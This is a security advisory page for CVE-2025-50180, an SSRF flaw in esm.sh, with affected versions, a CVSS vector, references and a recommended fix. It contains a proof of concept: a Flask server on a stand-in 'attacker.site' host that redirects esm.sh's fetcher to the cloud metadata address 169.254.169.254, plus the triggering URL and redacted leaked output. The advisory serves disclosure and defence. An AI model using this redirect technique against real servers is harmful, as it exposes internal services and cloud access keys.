CVE-2025-50180
EPSS 0.07%esm.sh is vulnerable to full-response SSRF
描述
### Summary esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability. ### Details Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511 If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address. eg: https://esm.sh/https://local.site/test.md ``` ".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx", ".cjs", ".cts", ".vue", ".svelte", ".md", ".css" ``` A 302 redirect can be used to bypass the suffix restriction. eg: https://esm.sh/https://attacker.site/test.md https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json ### PoC Use Flask to start a server that returns a 302 redirect. ```python from flask import Flask, redirect app = Flask(__name__) @app.route('/test.md') def redirect_test(): return redirect("http://169.254.169.254/v1.json", code=302) if __name__ == '__main__': app.run(host='0.0.0.0', port=80) ``` Let esh.sh visit this site. https://esm.sh/https://attacker.site/test.md Attacker can obtain data from http://169.254.169.254/v1.json. ``` var t=`<p>{"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]}</p> `,o={},u=t;export{u as default,t as html,o as meta}; ``` Decode the data (redacted) . ```json {"bgp":{"ipv4":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""},"ipv6":{"my-address":"","my-asn":"","peer-address":"","peer-asn":""}},"hostname":"****","instance-v2-id":"****","instanceid":"****","interfaces":[{"ipv4":{"additional":[],"address":"****","gateway":"****","netmask":"****","routes":[{"netmask":32,"network":"****"}]},"ipv6":{"additional":[],"address":"****","network":"****","prefix":"64"},"mac":"****","network-type":"public"}],"nvidia-driver":[],"public-keys":["****"],"region":{"countrycode":"US","regioncode":"SJC"},"tags":[]} ``` ### Impact An attacker can exploit the vulnerability to access internal sites, and in a cloud environment, can retrieve access keys (AK) and secret keys (SK) by accessing the metadata service address. ### Fix It is recommended to use `safeurl.Client` as a replacement for `http.Client`. https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/internal/fetch/fetch.go#L13 https://github.com/doyensec/safeurl
受影響套件(2)
- Go/github.com/esm-dev/esm.shfrom 0, < 0.0.0-20250616164159-0593516c4cfa
- Go/github.com/esm-dev/esm.shfrom 0, < 0.0.0-20250616164159-0593516c4cfa
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N |
參考連結(8)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-50180
- PATCHhttps://github.com/esm-dev/esm.sh
- WEBhttps://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/internal/fetch/fetch.go#L13
- WEBhttps://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511
- WEBhttps://github.com/esm-dev/esm.sh/commit/0593516c4cfab49ad3b4900416a8432ff2e23eb0
- WEBhttps://github.com/esm-dev/esm.sh/pull/1149
- WEBhttps://github.com/esm-dev/esm.sh/releases/tag/v137
- WEBhttps://github.com/esm-dev/esm.sh/security/advisories/GHSA-3c9r-837r-qqm4